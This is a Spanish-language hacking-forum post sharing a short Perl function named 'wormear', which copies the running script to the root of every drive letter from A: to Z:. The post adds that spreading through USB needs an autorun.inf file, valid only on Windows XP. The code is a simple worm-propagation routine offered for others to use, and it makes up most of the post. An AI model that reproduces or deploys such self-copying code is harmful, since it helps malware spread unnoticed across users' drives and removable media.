• Earn real money by being active: Hello Guest, earn real money by simply being active on the forum — post quality content, get reactions, and help the community. Once you reach the minimum credit amount, you’ll be able to withdraw your balance directly. Learn how it works.

Perl [Perl] Funcion wormer()

Status
Not open for further replies.

Doddy

Leech
User
Joined
Apr 1, 2012
Messages
169
Reputation
0
Reaction score
406
Points
63
Credits
0
‎13 Years of Service‎
57%
Con esta funcion podran copiar un archivo en todas las unidades disponibles , si quieren hacerlo funcional en usb tienen que crear al autorun.inf aunque solo seria valido en XP.

Code:
>
#ascii chr(65) = A | chr(90) = Z
#By Doddy H

use File::Copy;

sub wormear {
for my $dir(65..90) {
copy($0,chr($dir).":/");
}
}
Ejemplo de uso

Code:
>
wormear($0);
 
Status
Not open for further replies.
Back
Top